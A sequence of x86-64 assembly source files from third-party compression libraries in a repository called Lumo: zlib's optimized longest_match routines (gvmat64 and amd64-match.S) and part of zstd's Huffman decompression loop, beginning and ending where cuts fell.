mov [save_r13],r13
mov [save_r14],r14
mov [save_r15],r15
//;;; uInt wmask = s->w_mask;
//;;; unsigned chain_length = s->max_chain_length;
//;;; if (s->prev_length >= s->good_match) {
//;;; chain_length >>= 2;
//;;; }
mov edi, prev_length
mov esi, good_match
mov eax, WMask
mov ebx, max_chain_length
cmp edi, esi
jl LastMatchGood
shr ebx, 2
LastMatchGood:
//;;; chainlen is decremented once beforehand so that the function can
//;;; use the sign flag instead of the zero flag for the exit test.
//;;; It is then shifted into the high word, to make room for the wmask
//;;; value, which it will always accompany.
dec ebx
shl ebx, 16
or ebx, eax
//;;; on zlib only
//;;; if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead;
mov eax, nice_match
mov [chainlenwmask], ebx
mov r10d, Lookahead
cmp r10d, eax
cmovnl r10d, eax
mov [nicematch],r10d
//;;; register Bytef *scan = s->window + s->strstart;
mov r10, window_ad
mov ebp, strstart
lea r13, [r10 + rbp]
//;;; Determine how many bytes the scan ptr is off from being
//;;; dword-aligned.
mov r9,r13
neg r13
and r13,3
//;;; IPos limit = s->strstart > (IPos)MAX_DIST(s) ?
//;;; s->strstart - (IPos)MAX_DIST(s) : NIL;
mov eax, window_size
sub eax, MIN_LOOKAHEAD
xor edi,edi
sub ebp, eax
mov r11d, prev_length
cmovng ebp,edi
//;;; int best_len = s->prev_length;
//;;; Store the sum of s->window + best_len in esi locally, and in esi.
lea rsi,[r10+r11]
//;;; register ush scan_start = *(ushf*)scan;
//;;; register ush scan_end = *(ushf*)(scan+best_len-1);
//;;; Posf *prev = s->prev;
movzx r12d,word ptr [r9]
movzx ebx, word ptr [r9 + r11 - 1]
mov rdi, prev_ad
//;;; Jump into the main loop.
mov edx, [chainlenwmask]
cmp bx,word ptr [rsi + r8 - 1]
jz LookupLoopIsZero
LookupLoop1:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
jbe LeaveNow
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry1:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jz LookupLoopIsZero
AFTER_JMP
LookupLoop2:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
BEFORE_JMP
jbe LeaveNow
AFTER_JMP
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry2:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jz LookupLoopIsZero
AFTER_JMP
LookupLoop4:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
BEFORE_JMP
jbe LeaveNow
AFTER_JMP
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry4:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jnz LookupLoop1
jmp LookupLoopIsZero
AFTER_JMP
/*
;;; do {
;;; match = s->window + cur_match;
;;; if (*(ushf*)(match+best_len-1) != scan_end ||
;;; *(ushf*)match != scan_start) continue;
;;; [...]
;;; } while ((cur_match = prev[cur_match & wmask]) > limit
;;; && --chain_length != 0);
;;;
;;; Here is the inner loop of the function. The function will spend the
;;; majority of its time in this loop, and majority of that time will
;;; be spent in the first ten instructions.
;;;
;;; Within this loop:
;;; ebx = scanend
;;; r8d = curmatch
;;; edx = chainlenwmask - i.e., ((chainlen << 16) | wmask)
;;; esi = windowbestlen - i.e., (window + bestlen)
;;; edi = prev
;;; ebp = limit
*/
.balign 16
LookupLoop:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
BEFORE_JMP
jbe LeaveNow
AFTER_JMP
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jnz LookupLoop1
AFTER_JMP
LookupLoopIsZero:
cmp r12w, word ptr [r10 + r8]
BEFORE_JMP
jnz LookupLoop1
AFTER_JMP
//;;; Store the current value of chainlen.
mov [chainlenwmask], edx
/*
;;; Point edi to the string under scrutiny, and esi to the string we
;;; are hoping to match it up with. In actuality, esi and edi are
;;; both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and edx is
;;; initialized to -(MAX_MATCH_8 - scanalign).
*/
lea rsi,[r8+r10]
mov rdx, 0xfffffffffffffef8 //; -(MAX_MATCH_8)
lea rsi, [rsi + r13 + 0x0108] //;MAX_MATCH_8]
lea rdi, [r9 + r13 + 0x0108] //;MAX_MATCH_8]
prefetcht1 [rsi+rdx]
prefetcht1 [rdi+rdx]
/*
;;; Test the strings for equality, 8 bytes at a time. At the end,
;;; adjust rdx so that it is offset to the exact byte that mismatched.
;;;
;;; We already know at this point that the first three bytes of the
;;; strings match each other, and they can be safely passed over before
;;; starting the compare loop. So what this code does is skip over 0-3
;;; bytes, as much as necessary in order to dword-align the edi
;;; pointer. (rsi will still be misaligned three times out of four.)
;;;
;;; It should be confessed that this loop usually does not represent
;;; much of the total running time. Replacing it with a more
;;; straightforward "rep cmpsb" would not drastically degrade
;;; performance.
*/
LoopCmps:
mov rax, [rsi + rdx]
xor rax, [rdi + rdx]
jnz LeaveLoopCmps
mov rax, [rsi + rdx + 8]
xor rax, [rdi + rdx + 8]
jnz LeaveLoopCmps8
mov rax, [rsi + rdx + 8+8]
xor rax, [rdi + rdx + 8+8]
jnz LeaveLoopCmps16
add rdx,8+8+8
BEFORE_JMP
jnz LoopCmps
jmp LenMaximum
AFTER_JMP
LeaveLoopCmps16: add rdx,8
LeaveLoopCmps8: add rdx,8
LeaveLoopCmps:
test eax, 0x0000FFFF
jnz LenLower
test eax,0xffffffff
jnz LenLower32
add rdx,4
shr rax,32
or ax,ax
BEFORE_JMP
jnz LenLower
AFTER_JMP
LenLower32:
shr eax,16
add rdx,2
LenLower:
sub al, 1
adc rdx, 0
//;;; Calculate the length of the match. If it is longer than MAX_MATCH,
//;;; then automatically accept it as the best possible match and leave.
lea rax, [rdi + rdx]
sub rax, r9
cmp eax, MAX_MATCH
BEFORE_JMP
jge LenMaximum
AFTER_JMP
/*
;;; If the length of the match is not longer than the best match we
;;; have so far, then forget it and return to the lookup loop.
;///////////////////////////////////
*/
cmp eax, r11d
jg LongerMatch
lea rsi,[r10+r11]
mov rdi, prev_ad
mov edx, [chainlenwmask]
BEFORE_JMP
jmp LookupLoop
AFTER_JMP
/*
;;; s->match_start = cur_match;
;;; best_len = len;
;;; if (len >= nice_match) break;
;;; scan_end = *(ushf*)(scan+best_len-1);
*/
LongerMatch:
mov r11d, eax
mov match_start, r8d
cmp eax, [nicematch]
BEFORE_JMP
jge LeaveNow
AFTER_JMP
lea rsi,[r10+rax]
movzx ebx, word ptr [r9 + rax - 1]
mov rdi, prev_ad
mov edx, [chainlenwmask]
BEFORE_JMP
jmp LookupLoop
AFTER_JMP
//;;; Accept the current string, with the maximum possible length.
LenMaximum:
mov r11d,MAX_MATCH
mov match_start, r8d
//;;; if ((uInt)best_len <= s->lookahead) return (uInt)best_len;
//;;; return s->lookahead;
LeaveNow:
mov eax, Lookahead
cmp r11d, eax
cmovng eax, r11d
//;;; Restore the stack and return from whence we came.
// mov rsi,[save_rsi]
// mov rdi,[save_rdi]
mov rbx,[save_rbx]
mov rbp,[save_rbp]
mov r12,[save_r12]
mov r13,[save_r13]
mov r14,[save_r14]
mov r15,[save_r15]
ret 0
//; please don't remove this string !
//; Your can freely use gvmat64 in any free or commercial app
//; but it is far better don't remove the string in the binary!
// db 0dh,0ah,"asm686 with masm, optimised assembly code from Brian Raiter, written 1998, converted to amd 64 by Gilles Vollant 2005",0dh,0ah,0
match_init:
ret 0
|
aiekick/Lumo
| 12,418
|
3rdparty/assimp/contrib/zlib/contrib/amd64/amd64-match.S
|
/*
* match.S -- optimized version of longest_match()
* based on the similar work by Gilles Vollant, and Brian Raiter, written 1998
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the BSD License. Use by owners of Che Guevarra
* parafernalia is prohibited, where possible, and highly discouraged
* elsewhere.
*/
#ifndef NO_UNDERLINE
# define match_init _match_init
# define longest_match _longest_match
#endif
#define scanend ebx
#define scanendw bx
#define chainlenwmask edx /* high word: current chain len low word: s->wmask */
#define curmatch rsi
#define curmatchd esi
#define windowbestlen r8
#define scanalign r9
#define scanalignd r9d
#define window r10
#define bestlen r11
#define bestlend r11d
#define scanstart r12d
#define scanstartw r12w
#define scan r13
#define nicematch r14d
#define limit r15
#define limitd r15d
#define prev rcx
/*
* The 258 is a "magic number, not a parameter -- changing it
* breaks the hell loose
*/
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
#define LocalVarsSize (112)
#define _chainlenwmask ( 8-LocalVarsSize)(%rsp)
#define _windowbestlen (16-LocalVarsSize)(%rsp)
#define save_r14 (24-LocalVarsSize)(%rsp)
#define save_rsi (32-LocalVarsSize)(%rsp)
#define save_rbx (40-LocalVarsSize)(%rsp)
#define save_r12 (56-LocalVarsSize)(%rsp)
#define save_r13 (64-LocalVarsSize)(%rsp)
#define save_r15 (80-LocalVarsSize)(%rsp)
.globl match_init, longest_match
/*
* On AMD64 the first argument of a function (in our case -- the pointer to
* deflate_state structure) is passed in %rdi, hence our offsets below are
* all off of that.
*/
/* you can check the structure offset by running
#include <stdlib.h>
#include <stdio.h>
#include "deflate.h"
void print_depl()
{
deflate_state ds;
deflate_state *s=&ds;
printf("size pointer=%u\n",(int)sizeof(void*));
printf("#define dsWSize (%3u)(%%rdi)\n",(int)(((char*)&(s->w_size))-((char*)s)));
printf("#define dsWMask (%3u)(%%rdi)\n",(int)(((char*)&(s->w_mask))-((char*)s)));
printf("#define dsWindow (%3u)(%%rdi)\n",(int)(((char*)&(s->window))-((char*)s)));
printf("#define dsPrev (%3u)(%%rdi)\n",(int)(((char*)&(s->prev))-((char*)s)));
printf("#define dsMatchLen (%3u)(%%rdi)\n",(int)(((char*)&(s->match_length))-((char*)s)));
printf("#define dsPrevMatch (%3u)(%%rdi)\n",(int)(((char*)&(s->prev_match))-((char*)s)));
printf("#define dsStrStart (%3u)(%%rdi)\n",(int)(((char*)&(s->strstart))-((char*)s)));
printf("#define dsMatchStart (%3u)(%%rdi)\n",(int)(((char*)&(s->match_start))-((char*)s)));
printf("#define dsLookahead (%3u)(%%rdi)\n",(int)(((char*)&(s->lookahead))-((char*)s)));
printf("#define dsPrevLen (%3u)(%%rdi)\n",(int)(((char*)&(s->prev_length))-((char*)s)));
printf("#define dsMaxChainLen (%3u)(%%rdi)\n",(int)(((char*)&(s->max_chain_length))-((char*)s)));
printf("#define dsGoodMatch (%3u)(%%rdi)\n",(int)(((char*)&(s->good_match))-((char*)s)));
printf("#define dsNiceMatch (%3u)(%%rdi)\n",(int)(((char*)&(s->nice_match))-((char*)s)));
}
*/
/*
to compile for XCode 3.2 on MacOSX x86_64
- run "gcc -g -c -DXCODE_MAC_X64_STRUCTURE amd64-match.S"
*/
#ifndef CURRENT_LINX_XCODE_MAC_X64_STRUCTURE
#define dsWSize ( 68)(%rdi)
#define dsWMask ( 76)(%rdi)
#define dsWindow ( 80)(%rdi)
#define dsPrev ( 96)(%rdi)
#define dsMatchLen (144)(%rdi)
#define dsPrevMatch (148)(%rdi)
#define dsStrStart (156)(%rdi)
#define dsMatchStart (160)(%rdi)
#define dsLookahead (164)(%rdi)
#define dsPrevLen (168)(%rdi)
#define dsMaxChainLen (172)(%rdi)
#define dsGoodMatch (188)(%rdi)
#define dsNiceMatch (192)(%rdi)
#else
#ifndef STRUCT_OFFSET
# define STRUCT_OFFSET (0)
#endif
#define dsWSize ( 56 + STRUCT_OFFSET)(%rdi)
#define dsWMask ( 64 + STRUCT_OFFSET)(%rdi)
#define dsWindow ( 72 + STRUCT_OFFSET)(%rdi)
#define dsPrev ( 88 + STRUCT_OFFSET)(%rdi)
#define dsMatchLen (136 + STRUCT_OFFSET)(%rdi)
#define dsPrevMatch (140 + STRUCT_OFFSET)(%rdi)
#define dsStrStart (148 + STRUCT_OFFSET)(%rdi)
#define dsMatchStart (152 + STRUCT_OFFSET)(%rdi)
#define dsLookahead (156 + STRUCT_OFFSET)(%rdi)
#define dsPrevLen (160 + STRUCT_OFFSET)(%rdi)
#define dsMaxChainLen (164 + STRUCT_OFFSET)(%rdi)
#define dsGoodMatch (180 + STRUCT_OFFSET)(%rdi)
#define dsNiceMatch (184 + STRUCT_OFFSET)(%rdi)
#endif
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
longest_match:
/*
* Retrieve the function arguments. %curmatch will hold cur_match
* throughout the entire function (passed via rsi on amd64).
* rdi will hold the pointer to the deflate_state (first arg on amd64)
*/
mov %rsi, save_rsi
mov %rbx, save_rbx
mov %r12, save_r12
mov %r13, save_r13
mov %r14, save_r14
mov %r15, save_r15
/* uInt wmask = s->w_mask; */
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/* chain_length >>= 2; */
/* } */
movl dsPrevLen, %eax
movl dsGoodMatch, %ebx
cmpl %ebx, %eax
movl dsWMask, %eax
movl dsMaxChainLen, %chainlenwmask
jl LastMatchGood
shrl $2, %chainlenwmask
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the wmask */
/* value, which it will always accompany. */
decl %chainlenwmask
shll $16, %chainlenwmask
orl %eax, %chainlenwmask
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
movl dsNiceMatch, %eax
movl dsLookahead, %ebx
cmpl %eax, %ebx
jl LookaheadLess
movl %eax, %ebx
LookaheadLess: movl %ebx, %nicematch
/* register Bytef *scan = s->window + s->strstart; */
mov dsWindow, %window
movl dsStrStart, %limitd
lea (%limit, %window), %scan
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
mov %scan, %scanalign
negl %scanalignd
andl $3, %scanalignd
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/* s->strstart - (IPos)MAX_DIST(s) : NIL; */
movl dsWSize, %eax
subl $MIN_LOOKAHEAD, %eax
xorl %ecx, %ecx
subl %eax, %limitd
cmovng %ecx, %limitd
/* int best_len = s->prev_length; */
movl dsPrevLen, %bestlend
/* Store the sum of s->window + best_len in %windowbestlen locally, and in memory. */
lea (%window, %bestlen), %windowbestlen
mov %windowbestlen, _windowbestlen
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
/* Posf *prev = s->prev; */
movzwl (%scan), %scanstart
movzwl -1(%scan, %bestlen), %scanend
mov dsPrev, %prev
/* Jump into the main loop. */
movl %chainlenwmask, _chainlenwmask
jmp LoopEntry
.balign 16
/* do {
* match = s->window + cur_match;
* if (*(ushf*)(match+best_len-1) != scan_end ||
* *(ushf*)match != scan_start) continue;
* [...]
* } while ((cur_match = prev[cur_match & wmask]) > limit
* && --chain_length != 0);
*
* Here is the inner loop of the function. The function will spend the
* majority of its time in this loop, and majority of that time will
* be spent in the first ten instructions.
*/
LookupLoop:
andl %chainlenwmask, %curmatchd
movzwl (%prev, %curmatch, 2), %curmatchd
cmpl %limitd, %curmatchd
jbe LeaveNow
subl $0x00010000, %chainlenwmask
js LeaveNow
LoopEntry: cmpw -1(%windowbestlen, %curmatch), %scanendw
jne LookupLoop
cmpw %scanstartw, (%window, %curmatch)
jne LookupLoop
/* Store the current value of chainlen. */
movl %chainlenwmask, _chainlenwmask
/* %scan is the string under scrutiny, and %prev to the string we */
/* are hoping to match it up with. In actuality, %esi and %edi are */
/* both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and %edx is */
/* initialized to -(MAX_MATCH_8 - scanalign). */
mov $(-MAX_MATCH_8), %rdx
lea (%curmatch, %window), %windowbestlen
lea MAX_MATCH_8(%windowbestlen, %scanalign), %windowbestlen
lea MAX_MATCH_8(%scan, %scanalign), %prev
/* the prefetching below makes very little difference... */
prefetcht1 (%windowbestlen, %rdx)
prefetcht1 (%prev, %rdx)
/*
* Test the strings for equality, 8 bytes at a time. At the end,
* adjust %rdx so that it is offset to the exact byte that mismatched.
*
* It should be confessed that this loop usually does not represent
* much of the total running time. Replacing it with a more
* straightforward "rep cmpsb" would not drastically degrade
* performance -- unrolling it, for example, makes no difference.
*/
#undef USE_SSE /* works, but is 6-7% slower, than non-SSE... */
LoopCmps:
#ifdef USE_SSE
/* Preload the SSE registers */
movdqu (%windowbestlen, %rdx), %xmm1
movdqu (%prev, %rdx), %xmm2
pcmpeqb %xmm2, %xmm1
movdqu 16(%windowbestlen, %rdx), %xmm3
movdqu 16(%prev, %rdx), %xmm4
pcmpeqb %xmm4, %xmm3
movdqu 32(%windowbestlen, %rdx), %xmm5
movdqu 32(%prev, %rdx), %xmm6
pcmpeqb %xmm6, %xmm5
movdqu 48(%windowbestlen, %rdx), %xmm7
movdqu 48(%prev, %rdx), %xmm8
pcmpeqb %xmm8, %xmm7
/* Check the comparisions' results */
pmovmskb %xmm1, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
/* this is the only iteration of the loop with a possibility of having
incremented rdx by 0x108 (each loop iteration add 16*4 = 0x40
and (0x40*4)+8=0x108 */
add $8, %rdx
jz LenMaximum
add $8, %rdx
pmovmskb %xmm3, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
add $16, %rdx
pmovmskb %xmm5, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
add $16, %rdx
pmovmskb %xmm7, %rax
notw %ax
bsfw %ax, %ax
jnz LeaveLoopCmps
add $16, %rdx
jmp LoopCmps
LeaveLoopCmps: add %rax, %rdx
#else
mov (%windowbestlen, %rdx), %rax
xor (%prev, %rdx), %rax
jnz LeaveLoopCmps
mov 8(%windowbestlen, %rdx), %rax
xor 8(%prev, %rdx), %rax
jnz LeaveLoopCmps8
mov 16(%windowbestlen, %rdx), %rax
xor 16(%prev, %rdx), %rax
jnz LeaveLoopCmps16
add $24, %rdx
jnz LoopCmps
jmp LenMaximum
# if 0
/*
* This three-liner is tantalizingly simple, but bsf is a slow instruction,
* and the complicated alternative down below is quite a bit faster. Sad...
*/
LeaveLoopCmps: bsf %rax, %rax /* find the first non-zero bit */
shrl $3, %eax /* divide by 8 to get the byte */
add %rax, %rdx
# else
LeaveLoopCmps16:
add $8, %rdx
LeaveLoopCmps8:
add $8, %rdx
LeaveLoopCmps: testl $0xFFFFFFFF, %eax /* Check the first 4 bytes */
jnz Check16
add $4, %rdx
shr $32, %rax
Check16: testw $0xFFFF, %ax
jnz LenLower
add $2, %rdx
shrl $16, %eax
LenLower: subb $1, %al
adc $0, %rdx
# endif
#endif
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
lea (%prev, %rdx), %rax
sub %scan, %rax
cmpl $MAX_MATCH, %eax
jge LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
cmpl %bestlend, %eax
jg LongerMatch
mov _windowbestlen, %windowbestlen
mov dsPrev, %prev
movl _chainlenwmask, %edx
jmp LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch:
movl %eax, %bestlend
movl %curmatchd, dsMatchStart
cmpl %nicematch, %eax
jge LeaveNow
lea (%window, %bestlen), %windowbestlen
mov %windowbestlen, _windowbestlen
movzwl -1(%scan, %rax), %scanend
mov dsPrev, %prev
movl _chainlenwmask, %chainlenwmask
jmp LookupLoop
/* Accept the current string, with the maximum possible length. */
LenMaximum:
movl $MAX_MATCH, %bestlend
movl %curmatchd, dsMatchStart
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
movl dsLookahead, %eax
cmpl %eax, %bestlend
cmovngl %bestlend, %eax
LookaheadRet:
/* Restore the registers and return from whence we came. */
mov save_rsi, %rsi
mov save_rbx, %rbx
mov save_r12, %r12
mov save_r13, %r13
mov save_r14, %r14
mov save_r15, %r15
ret
match_init: ret
|
aiekick/Lumo
| 14,207
|
3rdparty/tracy/zstd/decompress/huf_decompress_amd64.S
|
/*
* Copyright (c) Meta Platforms, Inc. and affiliates.
* All rights reserved.
*
* This source code is licensed under both the BSD-style license (found in the
* LICENSE file in the root directory of this source tree) and the GPLv2 (found
* in the COPYING file in the root directory of this source tree).
* You may select, at your option, one of the above-listed licenses.
*/
#include "../common/portability_macros.h"
/* Stack marking
* ref: https://wiki.gentoo.org/wiki/Hardened/GNU_stack_quickstart
*/
#if defined(__ELF__) && defined(__GNUC__)
.section .note.GNU-stack,"",%progbits
#endif
#if ZSTD_ENABLE_ASM_X86_64_BMI2
/* Calling convention:
*
* %rdi contains the first argument: HUF_DecompressAsmArgs*.
* %rbp isn't maintained (no frame pointer).
* %rsp contains the stack pointer that grows down.
* No red-zone is assumed, only addresses >= %rsp are used.
* All register contents are preserved.
*
* TODO: Support Windows calling convention.
*/
ZSTD_HIDE_ASM_FUNCTION(HUF_decompress4X1_usingDTable_internal_fast_asm_loop)
ZSTD_HIDE_ASM_FUNCTION(HUF_decompress4X2_usingDTable_internal_fast_asm_loop)
ZSTD_HIDE_ASM_FUNCTION(_HUF_decompress4X2_usingDTable_internal_fast_asm_loop)
ZSTD_HIDE_ASM_FUNCTION(_HUF_decompress4X1_usingDTable_internal_fast_asm_loop)
.global HUF_decompress4X1_usingDTable_internal_fast_asm_loop
.global HUF_decompress4X2_usingDTable_internal_fast_asm_loop
.global _HUF_decompress4X1_usingDTable_internal_fast_asm_loop
.global _HUF_decompress4X2_usingDTable_internal_fast_asm_loop
.text
/* Sets up register mappings for clarity.
* op[], bits[], dtable & ip[0] each get their own register.
* ip[1,2,3] & olimit alias var[].
* %rax is a scratch register.
*/
#define op0 rsi
#define op1 rbx
#define op2 rcx
#define op3 rdi
#define ip0 r8
#define ip1 r9
#define ip2 r10
#define ip3 r11
#define bits0 rbp
#define bits1 rdx
#define bits2 r12
#define bits3 r13
#define dtable r14
#define olimit r15
/* var[] aliases ip[1,2,3] & olimit
* ip[1,2,3] are saved every iteration.
* olimit is only used in compute_olimit.
*/
#define var0 r15
#define var1 r9
#define var2 r10
#define var3 r11
/* 32-bit var registers */
#define vard0 r15d
#define vard1 r9d
#define vard2 r10d
#define vard3 r11d
/* Calls X(N) for each stream 0, 1, 2, 3. */
#define FOR_EACH_STREAM(X) \
X(0); \
X(1); \
X(2); \
X(3)
/* Calls X(N, idx) for each stream 0, 1, 2, 3. */
#define FOR_EACH_STREAM_WITH_INDEX(X, idx) \
X(0, idx); \
X(1, idx); \
X(2, idx); \
X(3, idx)
/* Define both _HUF_* & HUF_* symbols because MacOS
* C symbols are prefixed with '_' & Linux symbols aren't.
*/
_HUF_decompress4X1_usingDTable_internal_fast_asm_loop:
HUF_decompress4X1_usingDTable_internal_fast_asm_loop:
ZSTD_CET_ENDBRANCH
/* Save all registers - even if they are callee saved for simplicity. */
push %rax
push %rbx
push %rcx
push %rdx
push %rbp
push %rsi
push %rdi
push %r8
push %r9
push %r10
push %r11
push %r12
push %r13
push %r14
push %r15
/* Read HUF_DecompressAsmArgs* args from %rax */
movq %rdi, %rax
movq 0(%rax), %ip0
movq 8(%rax), %ip1
movq 16(%rax), %ip2
movq 24(%rax), %ip3
movq 32(%rax), %op0
movq 40(%rax), %op1
movq 48(%rax), %op2
movq 56(%rax), %op3
movq 64(%rax), %bits0
movq 72(%rax), %bits1
movq 80(%rax), %bits2
movq 88(%rax), %bits3
movq 96(%rax), %dtable
push %rax /* argument */
push 104(%rax) /* ilimit */
push 112(%rax) /* oend */
push %olimit /* olimit space */
subq $24, %rsp
.L_4X1_compute_olimit:
/* Computes how many iterations we can do safely
* %r15, %rax may be clobbered
* rbx, rdx must be saved
* op3 & ip0 mustn't be clobbered
*/
movq %rbx, 0(%rsp)
movq %rdx, 8(%rsp)
movq 32(%rsp), %rax /* rax = oend */
subq %op3, %rax /* rax = oend - op3 */
/* r15 = (oend - op3) / 5 */
movabsq $-3689348814741910323, %rdx
mulq %rdx
movq %rdx, %r15
shrq $2, %r15
movq %ip0, %rax /* rax = ip0 */
movq 40(%rsp), %rdx /* rdx = ilimit */
subq %rdx, %rax /* rax = ip0 - ilimit */
movq %rax, %rbx /* rbx = ip0 - ilimit */
/* rdx = (ip0 - ilimit) / 7 */
movabsq $2635249153387078803, %rdx
mulq %rdx
subq %rdx, %rbx
shrq %rbx
addq %rbx, %rdx
shrq $2, %rdx
/* r15 = min(%rdx, %r15) */
cmpq %rdx, %r15
cmova %rdx, %r15
/* r15 = r15 * 5 */
leaq (%r15, %r15, 4), %r15
/* olimit = op3 + r15 */
addq %op3, %olimit
movq 8(%rsp), %rdx
movq 0(%rsp), %rbx
/* If (op3 + 20 > olimit) */
movq %op3, %rax /* rax = op3 */
addq $20, %rax /* rax = op3 + 20 */
cmpq %rax, %olimit /* op3 + 20 > olimit */
jb .L_4X1_exit
/* If (ip1 < ip0) go to exit */
cmpq %ip0, %ip1
jb .L_4X1_exit
/* If (ip2 < ip1) go to exit */
cmpq %ip1, %ip2
jb .L_4X1_exit
/* If (ip3 < ip2) go to exit */
cmpq %ip2, %ip3
jb .L_4X1_exit
/* Reads top 11 bits from bits[n]
* Loads dt[bits[n]] into var[n]
*/
#define GET_NEXT_DELT(n) \
movq $53, %var##n; \
shrxq %var##n, %bits##n, %var##n; \
movzwl (%dtable,%var##n,2),%vard##n
/* var[n] must contain the DTable entry computed with GET_NEXT_DELT
* Moves var[n] to %rax
* bits[n] <<= var[n] & 63
* op[n][idx] = %rax >> 8
* %ah is a way to access bits [8, 16) of %rax
*/
#define DECODE_FROM_DELT(n, idx) \
movq %var##n, %rax; \
shlxq %var##n, %bits##n, %bits##n; \
movb %ah, idx(%op##n)
/* Assumes GET_NEXT_DELT has been called.
* Calls DECODE_FROM_DELT then GET_NEXT_DELT
*/
#define DECODE_AND_GET_NEXT(n, idx) \
DECODE_FROM_DELT(n, idx); \
GET_NEXT_DELT(n) \
/* // ctz & nbBytes is stored in bits[n]
* // nbBits is stored in %rax
* ctz = CTZ[bits[n]]
* nbBits = ctz & 7
* nbBytes = ctz >> 3
* op[n] += 5
* ip[n] -= nbBytes
* // Note: x86-64 is little-endian ==> no bswap
* bits[n] = MEM_readST(ip[n]) | 1
* bits[n] <<= nbBits
*/
#define RELOAD_BITS(n) \
bsfq %bits##n, %bits##n; \
movq %bits##n, %rax; \
andq $7, %rax; \
shrq $3, %bits##n; \
leaq 5(%op##n), %op##n; \
subq %bits##n, %ip##n; \
movq (%ip##n), %bits##n; \
orq $1, %bits##n; \
shlx %rax, %bits##n, %bits##n
/* Store clobbered variables on the stack */
movq %olimit, 24(%rsp)
movq %ip1, 0(%rsp)
movq %ip2, 8(%rsp)
movq %ip3, 16(%rsp)
/* Call GET_NEXT_DELT for each stream */
FOR_EACH_STREAM(GET_NEXT_DELT)
.p2align 6
.L_4X1_loop_body:
/* Decode 5 symbols in each of the 4 streams (20 total)
* Must have called GET_NEXT_DELT for each stream
*/
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 0)
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 1)
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 2)
FOR_EACH_STREAM_WITH_INDEX(DECODE_AND_GET_NEXT, 3)
FOR_EACH_STREAM_WITH_INDEX(DECODE_FROM_DELT, 4)
/* Load ip[1,2,3] from stack (var[] aliases them)
* ip[] is needed for RELOAD_BITS
* Each will be stored back to the stack after RELOAD
*/
movq 0(%rsp), %ip1
movq 8(%rsp), %ip2
movq 16(%rsp), %ip3
/* Reload each stream & fetch the next table entry
* to prepare for the next iteration
*/
RELOAD_BITS(0)
GET_NEXT_DELT(0)
RELOAD_BITS(1)
movq %ip1, 0(%rsp)
GET_NEXT_DELT(1)
RELOAD_BITS(2)
movq %ip2, 8(%rsp)
GET_NEXT_DELT(2)
RELOAD_BITS(3)
movq %ip3, 16(%rsp)
GET_NEXT_DELT(3)
/* If op3 < olimit: continue the loop */
cmp %op3, 24(%rsp)
ja .L_4X1_loop_body
/* Reload ip[1,2,3] from stack */
movq 0(%rsp), %ip1
movq 8(%rsp), %ip2
movq 16(%rsp), %ip3
/* Re-compute olimit */
jmp .L_4X1_compute_olimit
#undef GET_NEXT_DELT
#undef DECODE_FROM_DELT
#undef DECODE
#undef RELOAD_BITS
.L_4X1_exit:
addq $24, %rsp
/* Restore stack (oend & olimit) */
pop %rax /* olimit */
pop %rax /* oend */
pop %rax /* ilimit */
pop %rax /* arg */
/* Save ip / op / bits */
movq %ip0, 0(%rax)
movq %ip1, 8(%rax)
movq %ip2, 16(%rax)
movq %ip3, 24(%rax)
movq %op0, 32(%rax)
movq %op1, 40(%rax)
movq %op2, 48(%rax)
movq %op3, 56(%rax)
movq %bits0, 64(%rax)
movq %bits1, 72(%rax)
movq %bits2, 80(%rax)
movq %bits3, 88(%rax)
/* Restore registers */
pop %r15
pop %r14
pop %r13
pop %r12
pop %r11
pop %r10
pop %r9
pop %r8
pop %rdi
pop %rsi
pop %rbp
pop %rdx
pop %rcx
pop %rbx
pop %rax
ret
_HUF_decompress4X2_usingDTable_internal_fast_asm_loop:
HUF_decompress4X2_usingDTable_internal_fast_asm_loop:
ZSTD_CET_ENDBRANCH
/* Save all registers - even if they are callee saved for simplicity. */
push %rax
push %rbx
push %rcx
push %rdx
push %rbp
push %rsi
push %rdi
push %r8
push %r9
push %r10
push %r11
push %r12
push %r13
push %r14
